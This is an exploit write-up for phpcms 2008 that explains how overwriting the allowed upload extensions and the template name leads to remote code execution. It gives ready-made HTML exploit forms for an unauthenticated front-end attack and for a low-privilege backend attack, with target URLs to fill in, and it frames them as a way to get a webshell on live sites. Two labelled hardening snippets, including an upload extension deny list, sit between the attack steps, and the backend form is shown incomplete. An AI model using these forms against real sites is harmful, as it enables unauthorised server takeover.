1. First, the front end (no login required). Many sites have probably been patched already. The target is phpcms 2008: a variable-overwrite bug combined with a second parsing step (the template compiler) to getshell.
In upload_field.php:
```php
$upload_allowext = !empty($C['upload_allowext']) ? $C['upload_allowext'] : $info['upload_allowext'];
// vulnerability trigger point: $upload_allowext is overwritten by a request variable set to html
$upload_maxsize = !empty($C['upload_maxsize']) ? $C['upload_maxsize'] : $info['upload_maxsize'] * 1024;
$isthumb = isset($C['thumb_enable']) ? $C['thumb_enable'] : ($PHPCMS['thumb_enable'] && $info['isthumb'] ? 1 : 0);
$iswatermark = isset($C['watermark_enable']) ? $C['watermark_enable'] : ($PHPCMS['watermark_enable'] && $info['iswatermark'] ? 1 : 0);
$thumb_width = isset($width) ? $width : (isset($C['thumb_width']) ? $C['thumb_width'] : ($info['thumb_width'] ? $info['thumb_width'] : $PHPCMS['thumb_width']));
$thumb_height = isset($height) ? $height : (isset($C['thumb_height']) ? $C['thumb_height'] : ($info['thumb_height'] ? $info['thumb_height'] : $PHPCMS['thumb_height']));
$watermark_img = PHPCMS_ROOT . ($info['watermark_img'] ? $info['watermark_img'] : $PHPCMS['watermark_img']);
$attachment = new attachment($mod); // instantiate the attachment upload class
if ($dosubmit)
{
    $attachment->upload($uploadtext, $upload_allowext, $upload_maxsize, 1);
    // vulnerability trigger point: the attachment upload class is called with the overwritten extension list
}
```
Here ?C[upload_allowext]=html&C[upload_maxsize]=1024000 overwrites the allowed upload type, so a malicious script can be uploaded. php and the like cannot be uploaded directly (trace the attachment class file to see why), but html can.
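The hardened counterpart of the assignment block above, as an added example that is not phpcms code: the extension list and size limit are taken from server-side configuration only, and the uploaded name is checked against that list before any upload class is called. The constants SAFE_UPLOAD_ALLOWEXT, SAFE_UPLOAD_MAXSIZE and DENY_EXT and the function names are assumptions for this snippet; the sample $_FILES entries are constructed.

```php
<?php
// Added example, not phpcms code: request-supplied $C[upload_allowext] is never
// consulted; the whitelist and size limit are fixed server-side.

// Assumed server-side settings (in phpcms these live in $info / $PHPCMS).
const SAFE_UPLOAD_ALLOWEXT = 'jpg|jpeg|gif|png';
const SAFE_UPLOAD_MAXSIZE  = 2048 * 1024;

// Extensions refused regardless of configuration, because the web server will
// execute or render them; html is on this list for exactly the reason above.
const DENY_EXT = ['php', 'php3', 'php4', 'php5', 'phtml', 'html', 'htm', 'shtml', 'svg'];

function is_upload_allowed(string $filename, string $allowext): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if ($ext === '' || in_array($ext, DENY_EXT, true)) {
        return false;
    }
    $allowed = array_map('strtolower', explode('|', $allowext));
    return in_array($ext, $allowed, true);
}

// Hardened replacement for the vulnerable block: $file is one entry of
// $_FILES (the 'name' and 'size' keys are standard PHP).
function check_upload_request(array $file): string
{
    if (!is_upload_allowed($file['name'], SAFE_UPLOAD_ALLOWEXT)) {
        return 'rejected: extension not allowed';
    }
    if ($file['size'] > SAFE_UPLOAD_MAXSIZE) {
        return 'rejected: file too large';
    }
    return 'accepted';
}

// Constructed sample requests standing in for $_FILES['1'].
$samples = [
    ['name' => 'photo.jpg', 'size' => 120000],
    ['name' => 'page.html', 'size' => 500],
    ['name' => 'image.PHP', 'size' => 500],
    ['name' => 'big.png',   'size' => 5 * 1024 * 1024],
];
foreach ($samples as $s) {
    echo $s['name'], ': ', check_upload_request($s), PHP_EOL;
}
```

The check looks at the last extension only, so it should be paired with a web server configuration that does not execute or render scripts from the upload directory.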
Around line 60 of preview.php:
```php
$head['description'] = $r['description'];
if (!$template) $template = $C['template_show']; // $template is overwritten by a request variable
include template('phpcms', $template); // call the template parsing function

// The template() function
function template($module = 'phpcms', $template = 'index', $istag = 0)
{
    $compiledtplfile = TPL_CACHEPATH . $module . '_' . $template . '.tpl.php';
    if (TPL_REFRESH && (!file_exists($compiledtplfile) || @filemtime(TPL_ROOT . TPL_NAME . '/' . $module . '/' . $template . '.html') > @filemtime($compiledtplfile) || @filemtime(TPL_ROOT . TPL_NAME . '/tag.inc.php') > @filemtime($compiledtplfile)))
    {
        require_once PHPCMS_ROOT . 'include/template.func.php';
        template_compile($module, $template, $istag); // compile the template
    }
    return $compiledtplfile;
}
// continue to trace the template_compile() function
```
Line 2 of template.func.php:
```php
function template_compile($module, $template, $istag = 0)
{
    $tplfile = TPL_ROOT . TPL_NAME . '/' . $module . '/' . $template . '.html'; // $template is controllable
    $content = @file_get_contents($tplfile); // the vulnerability triggers here: the constructed malicious file is read and parsed
    if ($content === false) showmessage("$tplfile is not exists!");
    $compiledtplfile = TPL_CACHEPATH . $module . '_' . $template . '.tpl.php';
    $content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function _tag_' . $module . '_' . $template . '($data, $number, $rows, $count, $page, $pages, $setting) {global $PHPCMS, $MODULE, $M, $CATEGORY, $TYPE, $AREA, $GROUP, $MODEL, $templateid, $_userid, $_username; @extract($setting);?>' . template_parse($content, 1) . '<?php }?>' : template_parse($content);
    $strlen = file_put_contents($compiledtplfile, $content);
    @chmod($compiledtplfile, 0777);
    return $strlen;
}
```
That is the parsing step: because $template is controllable, template_compile() reads the uploaded file, writes it out as a compiled .tpl.php, and preview.php then includes it.
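The missing check in template() and template_compile() above, as an added example that is not phpcms code: the template name is validated as a plain identifier and the resolved path is required to stay inside the theme directory before anything is read. TPL_ROOT and TPL_NAME are assumed to be defined as in phpcms (defaults are set here only so the snippet runs alone); safe_template_path() and the sample names are assumptions of this example.

```php
<?php
// Added example, not phpcms code: refuse a request-supplied $template that is
// not a plain identifier or that does not resolve inside the theme directory.
defined('TPL_ROOT') || define('TPL_ROOT', __DIR__ . '/templates/');
defined('TPL_NAME') || define('TPL_NAME', 'default');

// Returns the resolved .html path, or null if the name is rejected.
function safe_template_path(string $module, string $template): ?string
{
    // Only letters, digits and underscore: no slashes, dots, NUL bytes or '..'.
    // \z (not $) so a trailing newline cannot slip through the anchor.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}\z/', $module)
        || !preg_match('/^[A-Za-z0-9_]{1,64}\z/', $template)) {
        return null;
    }
    $base = realpath(TPL_ROOT . TPL_NAME);
    if ($base === false) {
        return null;
    }
    // realpath() follows symlinks and returns false for a missing file, so a
    // legitimate but absent template is refused here, much as the
    // "is not exists" branch in template_compile() refuses it.
    $path = realpath($base . '/' . $module . '/' . $template . '.html');
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: the first resolves only if templates/default/phpcms/show.html
// exists; the others are refused before any filesystem access happens.
foreach (['show', '../../x', "show\0", 'show.html', "show\n"] as $name) {
    $result = safe_template_path('phpcms', $name);
    echo var_export($name, true), ' => ', var_export($result, true), PHP_EOL;
}
```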
Finally, the exp is given as follows:
```html
<form action="http://xxx.com/upload_field.php?C[upload_allowext]=html&C[upload_maxsize]=1024000&uinfo=1" method="post" enctype="multipart/form-data"> <!-- Modify the URL -->
<input type="file" name="1">
<input type="hidden" value="1" name="uploadtext">
<input type="hidden" value="" name="catid">
<input type="hidden" value="" name="rename">
<input type="hidden" value="" name="oldname">
<input type="hidden" value="1" name="modelid">
<input type="hidden" value="1" name="fieldid">
<input type="hidden" value="300" name="width">
<input type="hidden" value="300" name="height">
<input type="hidden" value="100000" name="MAX_FILE_SIZE">
<input type="submit" name="dosubmit" value="Upload" style="margin-top: 5px; height: 28px;">
</form>
```
2. getshell with low-privilege backend permissions
Many people get into the phpcms 2008 backend but struggle to get a shell. Pondering Gu contributed a 0-day post: as long as you can post in the backend, you can get a shell.
The principle is the same. When uploading images from the backend, the same variables can be overwritten to getshell. An exp demonstration follows:
```html
<form action="http://www.xxx.cn/admin.php?mod=phpcms&file=upload_field&C[upload_allowext]=html&C[upload_maxsize]=1024000&uinfo=1" method="post" enctype="multipart/form-data"> <!-- Modify the URL -->
<input type="file" name="1">
<input type="hidden" value="1" name="uploadtext">
<input type="hidden" value="" name="catid">
<input type="hidden" value="" name="rename">
<input type="hidden" value="" name="oldname">
```
You only need to change the target to admin.php.
The getshell then works just as in the front-end case and yields a webshell.